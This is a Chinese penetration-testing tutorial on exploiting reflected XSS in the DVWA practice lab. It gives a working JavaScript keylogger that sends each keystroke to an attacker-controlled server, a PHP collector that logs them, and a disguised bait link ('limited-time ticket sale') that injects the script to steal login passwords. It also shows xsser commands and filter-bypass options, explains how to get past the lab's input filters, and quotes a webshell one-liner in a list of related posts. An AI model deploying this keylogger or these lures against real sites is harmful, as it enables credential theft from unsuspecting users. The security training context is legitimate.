XSS

原则上:只要XSS漏洞存在,可以编写任何功能的js脚本

【反射型漏洞利用】

键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上

服务器:kali    客户端

启动apache2服务:service apache2 start

语法:<script src="http://192.168.1.127/keylogger.js"></script>

keylogger.js    

 document.onkeypress = function(evt) {

         evt = evt || window.event

         key = String.fromCharCode(evt.charCode)

         if(key) {

                 var http = new XMLHttpRequest();

                 var param = encodeURI(key)

                 http.open("POST","http://192.168.1.127/keylogger.php",true);

                 http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

                 http.send("key="+param);

         }

 }

 ~

keylogger.php  【用来接受客户端提交上来的数据】

 <?php

 $key=$_POST['key'];

 $logfile="keylog.txt";

 $fp = fopen($logfile,"a");

 fwrite($fp,$key);

 fclose($fp);

 >

为避免被引起用户怀疑,可将跳转命令置于html文件中

前提:用户已经登录网站,获得其cookie信息

#伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码

a.hmlt

 <a href="http://192.168.1.107/dvwa/vulnerabilities/xss_r/?name=<scripr+src='http://192.168.56.102/keylogger.js'></script>">诱人字眼</a>

XSS利用工具

Xsser  【专门针对XSS漏洞,使用python编写】

可使用图形化界面  xsser --gtk  【不建议使用,界面不够友好】

可绕过服务器端输入筛选  【xss存在极其普遍】

1、编码  10进制/16进制

2、函数:unecape()

简单使用语法:xsser -u "http://192.168.56.101/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=31677b04bc31eac6cd78dbb1922e8028" -s -v --reverse-check

GET:将对应页面和参数写进-g参数中;POST:使用-P;-s:统计请求数;-v:显示详细信息;--reverse-check:禁止提交hash值方式验证(此方法存在误判)】

--heuristic  探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}  【所有过滤机制都是基于字符过滤】

对payload编码,绕过服务器短筛选过滤  【过多编码可能造成语义误差】

   *Select Bypasser(s)*:

     These options can be used to encode selected vector(s) to try to

     bypass possible anti-XSS filters on target(s) code and possible IPS

     rules, if the target use it. Also, can be combined with other

     techniques to provide encoding:

     --Str               Use method String.FromCharCode()

     --Une               Use Unescape() function

     --Mix               Mix String.FromCharCode() and Unescape()

     --Dec               Use Decimal encoding

     --Hex               Use Hexadecimal encoding

     --Hes               Use Hexadecimal encoding, with semicolons

     --Dwo               Encode vectors IP addresses in DWORD

     --Doo               Encode vectors IP addresses in Octal

     --Cem=CEM           Try -manually- different Character Encoding Mutations

                         (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

注入技术

   *Special Technique(s)*:

     These options can be used to try to inject code using different type

     of XSS techniques. You can choose multiple:

     --Coo               COO - Cross Site Scripting Cookie injection

     --Xsa               XSA - Cross Site Agent Scripting

     --Xsr               XSR - Cross Site Referer Scripting

     --Dcp               DCP - Data Control Protocol injections

     --Dom               DOM - Document Object Model injections

     --Ind               IND - HTTP Response Splitting Induced code

     --Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)

     --Phpids            PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
   *Select Final injection(s)*:

     These options can be used to specify the final code to inject in

     vulnerable target(s). Important, if you want to exploit on-the-wild

     your discovered vulnerabilities. Choose only one option:

     --Fp=FINALPAYLOAD   OWN    - Insert your final code to inject -manually-

     --Fr=FINALREMOTE    REMOTE - Insert your final code to inject -remotelly-

     --Doss              DOSs   - XSS Denial of service (server) injection

     --Dos               DOS    - XSS Denial of service (client) injection

     --B64               B64    - Base64 code encoding in META tag (rfc2397)

   *Special Final injection(s)*:

     These options can be used to execute some 'special' injection(s) in

     vulnerable target(s). You can select multiple and combine with your

     final code (except with DCP code):

     --Onm               ONM - Use onMouseMove() event to inject code

     --Ifr               IFR - Use <iframe> source tag to inject code

源码分析

低安全级别  【$_GET[]:直接回显输入的数据,不做任何过滤】

  <?php

 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

  $isempty = true;

 } else {

  echo '<pre>';

  echo 'Hello ' . $_GET['name'];

  echo '</pre>';

 }

 ?>

中安全级别  【在输出时替换script为空,可拆分重整script为scriscriptpt】

  <?php

 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

  $isempty = true;

 } else {

  echo '<pre>';

  echo 'Hello ' . str_replace('<script>', '', $_GET['name']);

  echo '</pre>'; 

 }

 ?>

高安全级别【htmlspecialchars():进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如<a href=>】)】{可用burpsuite进行编码}

  <?php

 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

  $isempty = true;

 } else {

  echo '<pre>';

  echo 'Hello ' . htmlspecialchars($_GET['name']);

  echo '</pre>';

 }

 ?>

  

  

小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser的更多相关文章

  1. 小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto

    扫描工具-Nikto #WEB渗透 靶机:metasploitable 靶场:DVWA[默认账号/密码:admin/password] #新手先将DVWA的安全性,调到最低,可容易发现漏洞 侦察[减少 ...

  2. 小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish

    WEB渗透-skipfish Skipfish是一个命令行模式,以C语言编写的积极的Web应用程序的安全性侦察工具,没有代理模式. 它准备了一个互动为目标的网站的站点地图进行一个递归爬网和基于字典的探 ...

  3. 小白日记37:kali渗透测试之Web渗透-手动漏洞挖掘(三)-目录遍历、文件包含

    手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/ ...

  4. 小白日记49:kali渗透测试之Web渗透-XSS(三)-存储型XSS、DOM型XSS、神器BEFF

    存储型XSS与DOM型XSS [XSS原理] 存储型XSS 1.可长期存储于服务器端 2.每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留 ...

  5. 小白日记47:kali渗透测试之Web渗透-XSS(一)

    XSS [推荐书籍:XSS跨站脚本攻击剖析与防御] xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/ ...

  6. 小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

    sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns  [ ...

  7. 小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)

    webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用 ...

  8. 小白日记54:kali渗透测试之Web渗透-补充概念(AJAX,WEB Service)

    补充概念 AJAX(异步javascript和XML) Asynchronous javascript and xml 是一个概念,而非一种新的编程语言,是一组现有技术的组合 通过客户端脚本动态更新页 ...

  9. 小白日记52:kali渗透测试之Web渗透-HTTPS攻击(Openssl、sslscan、sslyze、检查SSL的网站)

    HTTPS攻击 全站HTTPS正策划稿那位潮流趋势 如:百度.阿里 HTTPS的作用 CIA 解决的是信息传输过程中数据被篡改.窃取 [从中注入恶意代码,多为链路劫持] 加密:对称.非对称.单向 HT ...

随机推荐

  1. C++11用于元编程的类别属性

    [C++11用于元编程的类别属性] 许多算法能作用在不同的数据类别; C++ 模板支持泛型,这使得代码能更紧凑和有用.然而,算法经常会需要目前作用的数据类别的信息.这种信息可以通过类别属性 (type ...

  2. Configure the Struts Tag Libraries

    In Struts framework, you always need to configure the Struts tag libraries in order to access it in ...

  3. HDU 3333 Turing Tree (树状数组)

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=3333 题意就是询问区间不同数字的和. 比较经典的树状数组应用. //#pragma comment(l ...

  4. ADT下开发环境的配置--个人配置啦 Eclipse Color Themes

    一. Eclipse Color Themes的安装 首先 这个ADT没有Marketplace Client 需要装一个, 节选自: http://blog.csdn.net/liu37226700 ...

  5. Redis基本操作-20150608

    Redis基本操作-20150608 [http://my.oschina.net/u/241255/blog/206991]   Redis是一个开源的使用ANSI C语言编写.支持网络.可基于内存 ...

  6. VC++中几种字符标志的解释

    VC++中几种字符标志的解释 LPSTR = char * LPCSTR = const char * LPWSTR = wchar_t * LPCWSTR = const wchar_t * LPO ...

  7. 为什么要把js代码写到<!--//-->中

    是为了兼容,不支持js的浏览器会把其中的内容当做html注释.

  8. 集成iscroll 下拉加载更多 jquery插件

    一个插件总是经过了数月的沉淀,不断的改进而成的.最初只是为了做个向下滚动,自动加载的插件.随着需求和功能的改进,才有了今天的这个稍算完整的插件. 一.插件主功能: 1.下拉加载 2.页面滚动到底部自动 ...

  9. java String和Date转换

    SimpleDateFormat函数语法:    G 年代标志符  y 年  M 月  d 日  h 时 在上午或下午 (1~12)  H 时 在一天中 (0~23)  m 分  s 秒  S 毫秒  ...

  10. Flex坐标

    flash和flex针对不同的目的,提供了3种不同的坐标系. 全局的就是(stage级别的) 本地坐标系(组件级别的) 内容坐标系(相对于本地坐标系说的) 这些坐标系的点是可以转换的,并且有相应的方法 ...